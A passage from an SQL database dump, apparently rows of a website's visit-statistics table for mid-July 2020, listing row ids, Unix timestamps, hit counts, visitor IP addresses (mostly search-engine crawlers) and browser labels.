,1,0,0,'66.249.70.70','chrome'),(522813,1594787198,1,1,0,0,'131.220.6.152','chrome'),(522814,1594787636,1,1,0,0,'207.46.13.173','other'),(522815,1594787797,2,2,0,0,'66.249.70.72','chrome'),(522816,1594788804,1,1,0,0,'62.205.134.182','other'),(522817,1594788819,2,2,0,0,'66.249.70.72','chrome'),(522818,1594788899,1,1,0,0,'207.46.13.20','other'),(522819,1594789127,1,1,0,0,'66.249.64.38','chrome'),(522820,1594789474,1,1,0,0,'207.46.13.104','other'),(522821,1594790185,1,1,0,0,'66.249.70.70','chrome'),(522822,1594790195,16,16,0,0,'37.247.110.110','other'),(522823,1594790800,16,16,0,0,'82.165.84.51','other'),(522824,1594792700,1,1,0,0,'157.55.39.137','other'),(522825,1594793270,2,2,0,0,'66.249.70.72','chrome'),(522826,1594793691,1,1,0,0,'91.196.178.169','chrome'),(522827,1594793713,1,1,0,0,'217.171.147.164','chrome'),(522828,1594794093,1,1,0,0,'141.98.102.172','msie'),(522829,1594794206,1,1,0,0,'109.187.83.8','firefox'),(522830,1594794314,1,1,0,0,'66.249.70.70','chrome'),(522831,1594794397,1,1,0,0,'66.249.64.33','chrome'),(522832,1594794423,1,1,0,0,'66.249.70.69','chrome'),(522833,1594794591,1,1,0,0,'8.29.198.26','other'),(522834,1594794676,1,1,0,0,'8.29.198.27','other'),(522835,1594794816,1,1,0,0,'91.196.177.46','chrome'),(522836,1594794991,4,4,0,0,'66.249.70.72','chrome'),(522837,1594795296,4,4,0,0,'66.249.70.70','chrome'),(522838,1594795602,1,1,0,0,'66.249.70.69','chrome'),(522839,1594795921,1,1,0,0,'91.196.178.175','chrome'),(522840,1594795939,2,2,0,0,'91.209.11.236','other'),(522841,1594795948,8,8,0,0,'185.11.82.228','other'),(522842,1594796383,1,1,0,0,'17.58.99.7','other'),(522843,1594797101,1,1,0,0,'91.209.11.236','other'),(522844,1594797210,8,8,0,0,'185.11.82.228','other'),(522845,1594797302,2,1,1,0,'66.249.70.69',''),(522846,1594797337,1,1,0,0,'76.217.31.195','chrome'),(522847,1594797731,1,1,0,0,'66.249.70.69','chrome'),(522848,1594797739,1,1,0,0,'207.46.13.20','other'),(522849,1594798971,8,8,0,0,'185.11.82.228','other'),(522850,1594799307,1,1,0,0,'157.55.39.137','other'),(522851,1594799422,1,1,0,0,'66.249.70.69','chrome'),(522852,1594800018,1,1,0,0,'194.61.24.94','other'),(522853,1594800201,1,1,0,0,'66.249.70.70','chrome'),(522854,1594800305,1,1,0,0,'31.13.127.112','other'),(522855,1594800439,8,8,0,0,'185.11.82.228','other'),(522856,1594800706,2,2,0,0,'66.249.70.72','chrome'),(522857,1594801467,3,3,0,0,'207.46.13.173','other'),(522858,1594801531,1,1,0,0,'157.55.39.137','other'),(522859,1594801888,8,8,0,0,'185.11.82.228','other'),(522860,1594801893,1,1,0,0,'178.95.75.57','chrome'),(522861,1594802023,1,1,0,0,'66.249.64.38','chrome'),(522862,1594802137,1,1,0,0,'141.98.102.172','msie'),(522863,1594802338,1,1,0,0,'66.249.70.69','chrome'),(522864,1594802412,1,1,0,0,'85.95.189.36','chrome'),(522865,1594802621,1,1,0,0,'66.249.64.33','chrome'),(522866,1594802797,2,2,0,0,'91.196.177.46','chrome'),(522867,1594803297,8,8,0,0,'185.11.82.228','other'),(522868,1594803483,1,1,0,0,'178.95.159.198','firefox'),(522869,1594803523,1,1,0,0,'178.95.159.198','chrome'),(522870,1594803558,1,1,0,0,'91.196.178.89','chrome'),(522871,1594804562,1,1,0,0,'91.196.178.89','chrome'),(522872,1594804689,8,8,0,0,'185.11.82.228','other'),(522873,1594805253,1,1,0,0,'3.237.15.178','chrome'),(522874,1594805422,2,2,0,0,'8.29.198.25','other'),(522875,1594805447,2,2,0,0,'157.55.39.137','other'),(522876,1594805599,1,1,0,0,'91.209.11.236','other'),(522877,1594805686,1,1,0,0,'66.249.64.38','chrome'),(522878,1594805696,1,1,0,0,'66.249.64.33','chrome'),(522879,1594806114,8,8,0,0,'185.11.82.228','other'),(522880,1594806409,1,1,0,0,'66.249.70.70','chrome'),(522881,1594807363,1,1,0,0,'66.249.64.36','chrome'),(522882,1594807447,1,1,0,0,'59.153.145.219','chrome'),(522883,1594807471,1,1,0,0,'207.46.13.173','other'),(522884,1594807590,8,8,0,0,'185.11.82.228','other'),(522885,1594808012,1,1,0,0,'157.55.39.137','other'),(522886,1594809016,8,8,0,0,'185.11.82.228','other'),(522887,1594809039,1,1,0,0,'173.252.127.33','other'),(522888,1594809040,1,1,0,0,'173.252.127.21','other'),(522889,1594809099,1,1,0,0,'178.154.200.220','other'),(522890,1594809116,1,1,0,0,'173.252.127.118','other'),(522891,1594809117,1,1,0,0,'173.252.127.18','other'),(522892,1594809129,1,1,0,0,'66.249.70.72','chrome'),(522893,1594809146,1,1,0,0,'173.252.127.25','other'),(522894,1594809147,1,1,0,0,'173.252.127.117','other'),(522895,1594809157,1,1,0,0,'207.46.13.20','other'),(522896,1594809246,2,2,0,0,'173.252.127.27','other'),(522897,1594809665,1,0,1,0,'66.249.70.69',''),(522898,1594810239,1,1,0,0,'66.249.64.38','chrome'),(522899,1594810371,1,1,0,0,'66.249.70.70','chrome'),(522900,1594810505,8,8,0,0,'185.11.82.228','other'),(522901,1594810857,1,1,0,0,'66.249.70.69','chrome'),(522902,1594811310,1,1,0,0,'207.46.13.173','other'),(522903,1594811344,1,1,0,0,'17.58.99.7','other'),(522904,1594811350,1,1,0,0,'66.249.70.70','chrome'),(522905,1594811609,1,1,0,0,'207.46.13.20','other'),(522906,1594811703,2,2,0,0,'95.213.141.126','opera'),(522907,1594811874,1,1,0,0,'91.209.11.236','other'),(522908,1594811950,8,8,0,0,'185.11.82.228','other'),(522909,1594812097,1,1,0,0,'109.74.154.72','chrome'),(522910,1594812179,1,1,0,0,'207.46.13.104','other'),(522911,1594812317,1,1,0,0,'178.95.75.57','chrome'),(522912,1594812552,1,1,0,0,'66.249.70.72','chrome'),(522913,1594813084,1,1,0,0,'91.196.178.89','chrome'),(522914,1594813337,8,8,0,0,'185.11.82.228','other'),(522915,1594813373,1,1,0,0,'40.77.188.236','other'),(522916,1594813384,1,1,0,0,'66.249.64.38','chrome'),(522917,1594813409,1,1,0,0,'91.196.179.33','chrome'),(522918,1594813694,1,1,0,0,'66.249.64.33','chrome'),(522919,1594813706,1,1,0,0,'178.95.75.57','chrome'),(522920,1594814296,2,2,0,0,'207.46.13.104','other'),(522921,1594814467,2,2,0,0,'66.249.70.72','chrome'),(522922,1594814788,8,8,0,0,'185.11.82.228','other'),(522923,1594814862,1,1,0,0,'157.55.39.137','other'),(522924,1594815111,1,1,0,0,'207.46.13.231','other'),(522925,1594816249,2,2,0,0,'8.29.198.27','other'),(522926,1594816262,8,8,0,0,'185.11.82.228','other'),(522927,1594816475,1,1,0,0,'141.98.102.172','msie'),(522928,1594816514,1,0,1,0,'66.249.70.70',''),(522929,1594816978,2,1,1,0,'66.249.70.70',''),(522930,1594817043,1,1,0,0,'66.249.70.72','chrome'),(522931,1594817622,1,1,0,0,'66.249.70.70','chrome'),(522932,1594817669,8,8,0,0,'185.11.82.228','other'),(522933,1594818045,1,1,0,0,'46.211.7.204','chrome'),(522934,1594818088,1,1,0,0,'91.196.178.89','chrome'),(522935,1594818271,2,2,0,0,'66.249.70.69','chrome'),(522936,1594818898,1,1,0,0,'107.178.194.102','chrome'),(522937,1594819246,8,8,0,0,'185.11.82.228','other'),(522938,1594820226,1,1,0,0,'66.249.70.69','chrome'),(522939,1594820840,8,8,0,0,'185.11.82.228','other'),(522940,1594820984,1,1,0,0,'207.46.13.20','other'),(522941,1594822698,8,8,0,0,'185.11.82.228','other'),(522942,1594823873,1,1,0,0,'66.249.70.70','chrome'),(522943,1594823955,1,1,0,0,'3.250.135.167','chrome'),(522944,1594824404,8,8,0,0,'185.11.82.228','other'),(522945,1594824662,1,1,0,0,'17.58.99.7','other'),(522946,1594825991,8,8,0,0,'185.11.82.228','other'),(522947,1594826263,1,1,0,0,'66.249.70.70','chrome'),(522948,1594826695,1,1,0,0,'207.46.13.104','other'),(522949,1594827075,1,1,0,0,'8.29.198.25','other'),(522950,1594827172,1,1,0,0,'8.29.198.27','other'),(522951,1594827568,8,8,0,0,'185.11.82.228','other'),(522952,1594828430,1,1,0,0,'34.254.175.103','chrome'),(522953,1594829103,8,8,0,0,'185.11.82.228','other'),(522954,1594830168,1,1,0,0,'37.187.75.16','chrome'),(522955,1594830695,8,8,0,0,'185.11.82.228','other'),(522956,1594830872,2,2,0,0,'138.246.253.15','chrome'),(522957,1594831565,1,1,0,0,'66.249.70.72','chrome'),(522958,1594832058,1,1,0,0,'66.249.70.70','chrome'),(522959,1594832481,8,8,0,0,'185.11.82.228','other'),(522960,1594833109,1,1,0,0,'66.249.70.69','chrome'),(522961,1594834436,8,8,0,0,'185.11.82.228','other'),(522962,1594834467,2,2,0,0,'51.210.161.23','other'),(522963,1594836484,8,8,0,0,'185.11.82.228','other'),(522964,1594836628,1,1,0,0,'207.46.13.20','other'),(522965,1594837077,1,1,0,0,'70.37.86.52','chrome'),(522966,1594837900,1,1,0,0,'8.29.198.25','other'),(522967,1594838004,1,1,0,0,'8.29.198.27','other'),(522968,1594839163,1,1,0,0,'52.188.57.228','chrome'),(522969,1594839919,8,8,0,0,'185.11.82.228','other'),(522970,1594840950,1,1,0,0,'207.46.13.104','other'),(522971,1594841158,1,1,0,0,'52.188.57.228','chrome'),(522972,1594842094,1,1,0,0,'66.249.70.70','chrome'),(522973,1594842311,2,2,0,0,'66.249.70.69','chrome'),(522974,1594842478,1,1,0,0,'88.155.89.197','chrome'),(522975,1594842519,1,1,0,0,'91.209.11.236','other'),(522976,1594842551,1,1,0,0,'66.249.64.33','chrome'),(522977,1594842620,2,2,0,0,'66.249.70.72','chrome'),(522978,1594843035,1,1,0,0,'207.46.13.20','other'),(522979,1594843530,1,1,0,0,'66.249.64.33','chrome'),(522980,1594843750,4,4,0,0,'66.249.70.69','chrome'),(522981,1594843987,2,2,0,0,'66.249.70.72','chrome'),(522982,1594844058,8,8,0,0,'185.11.82.228','other'),(522983,1594844460,2,2,0,0,'207.46.13.20','other'),(522984,1594844582,1,1,0,0,'66.249.70.70','chrome'),(522985,1594845070,1,1,0,0,'207.46.13.104','other'),(522986,1594845668,1,1,0,0,'66.249.70.72','chrome'),(522987,1594845874,1,1,0,0,'173.252.111.13','other'),(522988,1594845881,80,80,0,0,'158.69.243.138','other'),(522989,1594845941,29,29,0,0,'192.99.13.75','other'),(522990,1594846102,29,29,0,0,'192.99.13.186','other'),(522991,1594846391,1,1,0,0,'66.249.64.38','chrome'),(522992,1594846569,1,1,0,0,'66.249.70.69','chrome'),(522993,1594846785,49,49,0,0,'158.69.243.138','other'),(522994,1594846839,1,1,0,0,'17.58.99.7','other'),(522995,1594846870,24,24,0,0,'192.99.13.75','other'),(522996,1594847006,38,38,0,0,'192.99.13.186','other'),(522997,1594847216,1,1,0,0,'66.249.70.70','chrome'),(522998,1594847711,57,57,0,0,'158.69.243.138','other'),(522999,1594847808,32,32,0,0,'192.99.13.75','other'),(523000,1594847850,1,1,0,0,'66.249.64.33','chrome'),(523001,1594847923,41,41,0,0,'192.99.13.186','other'),(523002,1594848200,8,8,0,0,'185.11.82.228','other'),(523003,1594848616,4,4,0,0,'158.69.243.138','other'),(523004,1594848718,37,37,0,0,'192.99.13.75','other'),(523005,1594848722,2,2,0,0,'8.29.198.26','other'),(523006,1594848766,1,1,0,0,'66.249.70.69','chrome'),(523007,1594848828,36,36,0,0,'192.99.13.186','other'),(523008,1594849481,1,1,0,0,'37.143.63.162','chrome'),(523009,1594849621,39,39,0,0,'192.99.13.75','other'),(523010,1594849748,37,37,0,0,'192.99.13.186','other'),(523011,1594850388,1,1,0,0,'37.113.180.29','chrome'),(523012,1594850531,32,32,0,0,'192.99.13.75','other'),(523013,1594850550,2,2,0,0,'66.249.70.70','chrome'),(523014,1594850680,45,45,0,0,'192.99.13.186','other'),(523015,1594851323,1,1,0,0,'17.58.99.7','other'),(523016,1594851438,1,1,0,0,'66.249.70.72','chrome'),(523017,1594851591,53,53,0,0,'192.99.13.186','other'),(523018,1594851788,16,16,0,0,'192.99.13.75','other'),(523019,1594851873,1,1,0,0,'5.181.131.145','chrome'),(523020,1594852038,8,8,0,0,'185.11.82.228','other'),(523021,1594852498,29,29,0,0,'192.99.13.186','other'),(523022,1594853419,42,42,0,0,'192.99.13.186','other'),(523023,1594853965,1,1,0,0,'66.249.70.69','chrome'),(523024,1594854170,1,1,0,0,'66.249.70.70','chrome'),(523025,1594854353,6,6,0,0,'192.99.13.186','other'),(523026,1594854758,1,1,0,0,'157.55.39.137','other'),(523027,1594854952,1,1,0,0,'17.58.99.7','other'),(523028,1594855200,1,1,0,0,'207.46.13.104','other'),(523029,1594855766,8,8,0,0,'185.11.82.228','other'),(523030,1594855922,25,25,0,0,'192.99.13.186','other'),(523031,1594856191,1,1,0,0,'157.55.39.137','other'),(523032,1594856290,1,1,0,0,'66.249.70.69','chrome'),(523033,1594856527,1,1,0,0,'88.155.4.157','other'),(523034,1594856850,7,7,0,0,'192.99.13.186','other'),(523035,1594857308,1,1,0,0,'62.205.134.182','other'),(523036,1594857372,1,1,0,0,'207.46.13.8','other'),(523037,1594858043,1,1,0,0,'207.46.13.104','other'),(523038,1594859546,1,1,0,0,'8.29.198.25','other'),(523039,1594859629,8,8,0,0,'185.11.82.228','other'),(523040,1594859649,1,1,0,0,'8.29.198.27','other'),(523041,1594860446,1,1,0,0,'66.249.70.69','chrome'),(523042,1594861352,1,1,0,0,'66.249.70.69','chrome'),(523043,1594861497,1,1,0,0,'66.249.70.70','chrome'),(523044,1594861772,1,1,0,0,'207.46.13.104','other'),(523045,1594862137,1,1,0,0,'207.46.13.8','other'),(523046,1594863537,8,8,0,0,'185.11.82.228','other'),(523047,1594863839,1,1,0,0,'66.249.64.33','chrome'),(523048,1594863866,1,1,0,0,'207.46.13.104','other'),(523049,1594864097,1,1,0,0,'193.106.30.99','firefox'),(523050,1594864514,1,1,0,0,'207.46.13.8','other'),(523051,1594864721,1,1,0,0,'66.249.70.70','chrome'),(523052,1594865670,1,1,0,0,'207.46.13.104','other'),(523053,1594865688,1,1,0,0,'66.249.70.69','chrome'),(523054,1594866932,1,1,0,0,'192.77.250.206','chrome'),(523055,1594867423,1,1,0,0,'185.15.56.22','other'),(523056,1594867427,1,1,0,0,'184.94.240.92','firefox'),(523057,1594867668,8,8,0,0,'185.11.82.228','other'),(523058,1594868530,3,3,0,0,'5.9.70.72','other'),(523059,1594869943,1,1,0,0,'62.149.15.172','chrome'),(523060,1594869966,120,120,0,0,'185.214.165.113','firefox'),(523061,1594870039,1,1,0,0,'207.46.13.8','other'),(523062,1594870137,1,1,0,0,'66.249.64.36','chrome'),(523063,1594870378,1,1,0,0,'8.29.198.27','other'),(523064,1594870474,1,1,0,0,'8.29.198.25','other'),(523065,1594870721,1,1,0,0,'66.249.64.38','chrome'),(523066,1594871053,1,1,0,0,'66.249.64.33','chrome'),(523067,1594871056,1,1,0,0,'66.249.70.70','chrome'),(523068,1594871517,1,1,0,0,'66.249.70.72','chrome'),(523069,1594871873,1,0,1,0,'66.249.70.69',''),(523070,1594871936,1,1,0,0,'91.209.11.236','other'),(523071,1594872217,8,8,0,0,'185.11.82.228','other'),(523072,1594872728,2,2,0,0,'66.249.70.69','chrome'),(523073,1594872803,1,1,0,0,'207.246.127.180','other'),(523074,1594873208,1,1,0,0,'66.249.70.70','chrome'),(523075,1594873253,1,1,0,0,'207.46.13.20','other'),(523076,1594873737,2,2,0,0,'66.249.70.72','chrome'),(523077,1594873951,1,1,0,0,'66.249.64.38','chrome'),(523078,1594874014,1,1,0,0,'207.246.127.180','other'),(523079,1594874112,1,1,0,0,'131.220.6.152','chrome'),(523080,1594874217,1,1,0,0,'66.249.70.69','chrome'),(523081,1594874847,1,1,0,0,'66.249.70.70','chrome'),(523082,1594875039,1,1,0,0,'194.61.24.94','other'),(523083,1594875090,1,1,0,0,'66.249.64.36','chrome'),(523084,1594875107,2,2,0,0,'66.249.70.72','chrome'),(523085,1594875216,1,1,0,0,'62.205.134.182','other'),(523086,1594875646,1,1,0,0,'66.249.64.33','chrome'),(523087,1594876381,1,1,0,0,'66.249.64.38','chrome'),(523088,1594877174,8,8,0,0,'185.11.82.228','other'),(523089,1594877373,2,2,0,0,'66.249.70.69','chrome'),(523090,1594877620,1,1,0,0,'66.249.70.70','chrome'),(523091,1594877758,1,1,0,0,'66.249.70.72','chrome'),(523092,1594877948,1,1,0,0,'212.1.124.210','chrome'),(523093,1594879252,1,1,0,0,'17.58.99.7','other'),(523094,1594879519,2,2,0,0,'66.249.64.38','chrome'),(523095,1594880235,1,1,0,0,'66.249.64.33','chrome'),(523096,1594880318,1,1,0,0,'157.55.39.73','other'),(523097,1594880346,1,1,0,0,'66.249.70.72','chrome'),(523098,1594880642,5,5,0,0,'66.249.70.69','chrome'),(523099,1594880977,1,1,0,0,'66.249.70.70','chrome'),(523100,1594881205,2,2,0,0,'8.29.198.25','other'),(523101,1594881457,2,2,0,0,'66.249.70.72','chrome'),(523102,1594881769,7,7,0,0,'66.249.70.69','chrome'),(523103,1594882537,1,1,0,0,'37.53.226.237','chrome'),(523104,1594882590,4,4,0,0,'66.249.70.72','chrome'),(523105,1594882646,1,1,0,0,'37.59.46.228','chrome'),(523106,1594882702,8,8,0,0,'185.11.82.228','other'),(523107,1594882935,1,1,0,0,'66.249.70.69','chrome'),(523108,1594884222,3,3,0,0,'207.46.13.20','other'),(523109,1594884263,6,6,0,0,'66.249.70.72','chrome'),(523110,1594884322,3,3,0,0,'66.249.70.69','chrome'),(523111,1594884663,1,1,0,0,'178.154.200.92','other'),(523112,1594884716,3,3,0,0,'66.249.70.70','chrome'),(523113,1594885061,1,1,0,0,'66.249.64.33','chrome'),(523114,1594885110,1,1,0,0,'17.58.99.7','other'),(523115,1594885195,2,2,0,0,'66.249.70.72','chrome'),(523116,1594885248,3,2,1,0,'66.249.70.69',''),(523117,1594885258,1,1,0,0,'213.180.203.16','other'),(523118,1594885576,1,1,0,0,'66.249.64.36','chrome'),(523119,1594885606,4,4,0,0,'66.249.70.69','chrome'),(523120,1594885715,3,3,0,0,'66.249.70.70','chrome'),(523121,1594885970,2,2,0,0,'40.88.21.235','other'),(523122,1594886184,1,1,0,0,'95.217.162.68','chrome'),(523123,1594886907,1,1,0,0,'17.58.99.7','other'),(523124,1594887144,2,2,0,0,'66.249.70.72','chrome'),(523125,1594887239,2,2,0,0,'66.249.70.69','chrome'),(523126,1594887337,1,1,0,0,'5.255.253.82','other'),(523127,1594887421,1,1,0,0,'207.46.13.20','other'),(523128,1594887823,1,1,0,0,'66.249.64.33','chrome'),(523129,1594888116,4,4,0,0,'66.249.70.70','chrome'),(523130,1594888125,1,1,0,0,'91.196.178.89','chrome'),(523131,1594888218,1,1,0,0,'178.95.156.86','chrome'),(523132,1594888293,4,4,0,0,'66.249.70.69','chrome'),(523133,1594888359,4,4,0,0,'66.249.70.72','chrome'),(523134,1594888956,8,8,0,0,'185.11.82.228','other'),(523135,1594889144,1,1,0,0,'66.249.70.70','chrome'),(523136,1594889286,1,1,0,0,'178.154.200.222','other'),(523137,1594889417,2,2,0,0,'66.249.70.72','chrome'),(523138,1594889607,2,2,0,0,'66.249.70.69','chrome'),(523139,1594889916,1,1,0,0,'91.196.178.173','chrome'),(523140,1594890179,2,2,0,0,'66.249.64.38','chrome'),(523141,1594890231,3,3,0,0,'66.249.70.70','chrome'),(523142,1594890310,1,1,0,0,'141.98.102.172','msie'),(523143,1594890477,1,1,0,0,'157.55.39.137','other'),(523144,1594890530,1,1,0,0,'66.249.70.72','chrome'),(523145,1594890587,1,1,0,0,'91.196.178.148','chrome'),(523146,1594890602,4,4,0,0,'66.249.70.69','chrome'),(523147,1594891230,1,1,0,0,'66.249.64.36','chrome'),(523148,1594891237,2,2,0,0,'66.249.64.33','chrome'),(523149,1594891260,2,2,0,0,'66.249.70.70','chrome'),(523150,1594891442,2,2,0,0,'91.196.178.169','chrome'),(523151,1594891867,2,2,0,0,'66.249.70.69','chrome'),(523152,1594891935,1,1,0,0,'91.196.178.187','chrome'),(523153,1594891949,1,1,0,0,'178.154.200.196','other'),(523154,1594892035,2,2,0,0,'8.29.198.27','other'),(523155,1594892045,1,1,0,0,'66.249.70.72','chrome'),(523156,1594892457,2,2,0,0,'91.196.178.89','chrome'),(523157,1594892632,1,1,0,0,'2.47.39.218','other'),(523158,1594893174,2,2,0,0,'178.154.200.222','other'),(523159,1594893290,3,3,0,0,'66.249.70.69','chrome'),(523160,1594893553,2,2,0,0,'66.249.70.70','chrome'),(523161,1594893622,3,3,0,0,'66.249.70.72','chrome'),(523162,1594893733,1,1,0,0,'157.55.39.137','other'),(523163,1594893822,3,3,0,0,'66.249.64.36','chrome'),(523164,1594893866,1,1,0,0,'3.17.130.130','chrome'),(523165,1594894528,6,6,0,0,'66.249.70.69','chrome'),(523166,1594895100,1,1,0,0,'195.138.76.89','chrome'),(523167,1594895184,1,1,0,0,'207.46.13.203','other'),(523168,1594895208,3,3,0,0,'66.249.70.72','chrome'),(523169,1594895478,1,1,0,0,'66.249.70.70','chrome'),(523170,1594895576,1,1,0,0,'66.249.64.36','chrome'),(523171,1594895735,2,2,0,0,'178.154.200.222','other'),(523172,1594896105,3,3,0,0,'66.249.70.69','chrome'),(523173,1594896263,1,1,0,0,'66.249.64.38','chrome'),(523174,1594896371,1,1,0,0,'66.249.64.33','chrome'),(523175,1594896453,2,2,0,0,'66.249.70.72','chrome'),(523176,1594896487,1,1,0,0,'178.154.200.196','other'),(523177,1594897243,1,1,0,0,'178.154.200.222','other'),(523178,1594897268,2,2,0,0,'66.249.70.70','chrome'),(523179,1594897419,1,1,0,0,'66.249.70.72','chrome'),(523180,1594897462,1,1,0,0,'66.249.64.33','chrome'),(523181,1594897884,8,8,0,0,'185.11.82.228','other'),(523182,1594898057,1,1,0,0,'178.154.200.41','other'),(523183,1594898215,1,1,0,0,'109.74.154.72','chrome'),(523184,1594898494,2,2,0,0,'66.249.70.72','chrome'),(523185,1594898592,1,1,0,0,'178.95.75.57','chrome'),(523186,1594898599,3,3,0,0,'66.249.70.70','chrome'),(523187,1594898794,1,1,0,0,'213.180.203.17','other'),(523188,1594899011,1,1,0,0,'95.94.3.153','chrome'),(523189,1594899458,2,2,0,0,'66.249.64.33','chrome'),(523190,1594899594,1,1,0,0,'66.249.70.72','chrome'),(523191,1594900126,3,3,0,0,'66.249.70.69','chrome'),(523192,1594900425,1,1,0,0,'195.230.149.30','chrome'),(523193,1594900537,1,1,0,0,'66.249.70.70','chrome'),(523194,1594900764,1,1,0,0,'66.249.64.36','chrome'),(523195,1594900871,1,1,0,0,'213.180.203.95','other'),(523196,1594900921,1,1,0,0,'66.249.70.72','chrome'),(523197,1594901045,1,1,0,0,'178.154.200.222','other'),(523198,1594901598,1,1,0,0,'17.58.99.7','other'),(523199,1594901628,1,1,0,0,'207.46.13.20','other'),(523200,1594902101,1,1,0,0,'66.249.64.38','chrome'),(523201,1594902364,5,5,0,0,'66.249.70.69','chrome'),(523202,1594902630,2,2,0,0,'66.249.64.33','chrome'),(523203,1594902860,2,2,0,0,'8.29.198.26','other'),(523204,1594902988,1,1,0,0,'178.154.200.191','other'),(523205,1594903079,1,1,0,0,'17.58.99.7','other'),(523206,1594903126,1,1,0,0,'66.249.70.70','chrome'),(523207,1594903592,1,1,0,0,'66.249.64.33','chrome'),(523208,1594903842,1,1,0,0,'91.196.178.89','chrome'),(523209,1594903987,2,2,0,0,'66.249.70.69','chrome'),(523210,1594904361,1,1,0,0,'66.249.70.70','chrome'),(523211,1594904430,1,1,0,0,'66.249.70.72','chrome'),(523212,1594904521,1,1,0,0,'130.180.217.22','chrome'),(523213,1594905076,1,1,0,0,'157.55.39.137','other'),(523214,1594905143,1,1,0,0,'66.249.64.38','chrome'),(523215,1594905875,4,4,0,0,'66.249.70.69','chrome'),(523216,1594906010,4,4,0,0,'66.249.70.72','chrome'),(523217,1594906036,2,2,0,0,'66.249.64.36','chrome'),(523218,1594906828,1,1,0,0,'66.249.70.70','chrome'),(523219,1594906940,1,1,0,0,'178.154.200.97','other'),(523220,1594907427,2,2,0,0,'178.154.200.222','other'),(523221,1594907437,1,1,0,0,'157.55.39.137','other'),(523222,1594908021,8,8,0,0,'185.11.82.228','other'),(523223,1594908116,2,2,0,0,'66.249.64.36','chrome'),(523224,1594908165,1,1,0,0,'66.249.64.33','chrome'),(523225,1594908320,3,3,0,0,'66.249.70.70','chrome'),(523226,1594908507,2,2,0,0,'66.249.70.69','chrome'),(523227,1594908875,2,2,0,0,'207.46.13.20','other'),(523228,1594909018,2,2,0,0,'81.169.144.135','other'),(523229,1594909318,3,3,0,0,'66.249.70.70','chrome'),(523230,1594909709,2,2,0,0,'66.249.70.72','chrome'),(523231,1594909802,1,1,0,0,'91.196.178.187','chrome'),(523232,1594910136,1,1,0,0,'66.249.70.69','chrome'),(523233,1594910251,1,1,0,0,'178.154.200.222','other'),(523234,1594910820,2,2,0,0,'66.249.70.72','chrome'),(523235,1594911591,1,1,0,0,'66.249.64.36','chrome'),(523236,1594911759,4,4,0,0,'66.249.70.72','chrome'),(523237,1594911929,1,1,0,0,'157.55.39.137','other'),(523238,1594912015,3,3,0,0,'66.249.70.69','chrome'),(523239,1594912028,2,2,0,0,'66.249.64.38','chrome'),(523240,1594912035,2,2,0,0,'66.249.64.33','chrome'),(523241,1594912061,1,1,0,0,'66.249.70.70','chrome'),(523242,1594913018,1,1,0,0,'31.148.23.122','chrome'),(523243,1594913139,1,1,0,0,'66.249.64.38','chrome'),(523244,1594913684,1,1,0,0,'8.29.198.25','other'),(523245,1594913786,1,1,0,0,'8.29.198.26','other'),(523246,1594913934,2,2,0,0,'66.249.70.72','chrome'),(523247,1594913950,1,1,0,0,'66.249.64.36','chrome'),(523248,1594914019,6,6,0,0,'66.249.70.69','chrome'),(523249,1594914042,1,1,0,0,'178.154.200.222','other'),(523250,1594914266,3,3,0,0,'66.249.64.33','chrome'),(523251,1594914666,1,1,0,0,'178.154.200.220','other'),(523252,1594914834,1,1,0,0,'66.249.64.38','chrome'),(523253,1594915436,1,1,0,0,'212.1.124.210','chrome'),(523254,1594915760,2,2,0,0,'66.249.70.70','chrome'),(523255,1594916189,1,1,0,0,'178.154.200.222','other'),(523256,1594916723,2,2,0,0,'66.249.70.70','chrome'),(523257,1594916772,1,1,0,0,'66.249.70.72','chrome'),(523258,1594917068,3,3,0,0,'66.249.70.69','chrome'),(523259,1594917207,1,1,0,0,'91.224.156.137','chrome'),(523260,1594917409,1,1,0,0,'66.249.64.38','chrome'),(523261,1594918241,1,1,0,0,'66.249.70.70','chrome'),(523262,1594918263,2,2,0,0,'66.249.70.69','chrome'),(523263,1594918796,2,2,0,0,'66.249.70.72','chrome'),(523264,1594919192,8,8,0,0,'185.11.82.228','other'),(523265,1594919295,1,1,0,0,'66.249.70.69','chrome'),(523266,1594919450,1,1,0,0,'178.154.200.222','other'),(523267,1594919696,1,1,0,0,'66.249.70.70','chrome'),(523268,1594920025,1,1,0,0,'213.180.203.140','other'),(523269,1594920113,1,1,0,0,'213.180.203.16','other'),(523270,1594920259,1,1,0,0,'5.255.253.82','other'),(523271,1594920550,1,1,0,0,'66.249.70.69','chrome'),(523272,1594920581,1,1,0,0,'91.196.178.149','chrome'),(523273,1594920974,1,1,0,0,'66.249.70.70','chrome'),(523274,1594921044,1,1,0,0,'178.154.200.216','other'),(523275,1594921055,1,1,0,0,'178.154.200.222','other'),(523276,1594922696,1,1,0,0,'66.249.70.72','chrome'),(523277,1594923488,1,1,0,0,'178.154.200.222','other'),(523278,1594923806,1,1,0,0,'66.249.70.69','chrome'),(523279,1594924318,1,1,0,0,'66.249.70.70','chrome'),(523280,1594924508,1,1,0,0,'8.29.198.27','other'),(523281,1594924617,1,1,0,0,'8.29.198.26','other'),(523282,1594926579,2,2,0,0,'66.249.70.70','chrome'),(523283,1594927498,1,1,0,0,'66.249.70.69','chrome'),(523284,1594927858,1,1,0,0,'91.196.178.181','chrome'),(523285,1594927929,1,1,0,0,'66.249.70.70','chrome'),(523286,1594928205,1,1,0,0,'66.249.70.72','chrome'),(523287,1594928326,1,1,0,0,'66.249.64.38','chrome'),(523288,1594928385,1,1,0,0,'109.197.220.140','chrome'),(523289,1594928556,1,1,0,0,'37.73.64.59','chrome'),(523290,1594928960,1,0,1,0,'66.249.70.70',''),(523291,1594929116,1,1,0,0,'5.255.253.111','other'),(523292,1594929229,1,1,0,0,'66.249.70.72','chrome'),(523293,1594931014,1,1,0,0,'131.220.6.156','chrome'),(523294,1594931138,2,2,0,0,'66.249.70.69','chrome'),(523295,1594931434,2,2,0,0,'66.249.70.72','chrome'),(523296,1594931548,1,1,0,0,'178.154.200.196','other'),(523297,1594931654,2,2,0,0,'66.249.64.38','chrome'),(523298,1594931844,4,4,0,0,'66.249.70.70','chrome'),(523299,1594932270,1,1,0,0,'178.154.200.222','other'),(523300,1594932433,1,1,0,0,'66.249.70.69','chrome'),(523301,1594934463,1,1,0,0,'157.55.39.137','other'),(523302,1594934622,1,1,0,0,'5.255.253.82','other'),(523303,1594934640,8,8,0,0,'185.11.82.228','other'),(523304,1594934735,1,1,0,0,'66.249.64.33','chrome'),(523305,1594934799,1,1,0,0,'178.154.200.220','other'),(523306,1594934814,3,3,0,0,'66.249.70.69','chrome'),(523307,1594935254,3,3,0,0,'66.249.70.70','chrome'),(523308,1594935331,2,2,0,0,'8.29.198.25','other'),(523309,1594935369,2,2,0,0,'66.249.70.72','chrome'),(523310,1594935464,1,1,0,0,'213.180.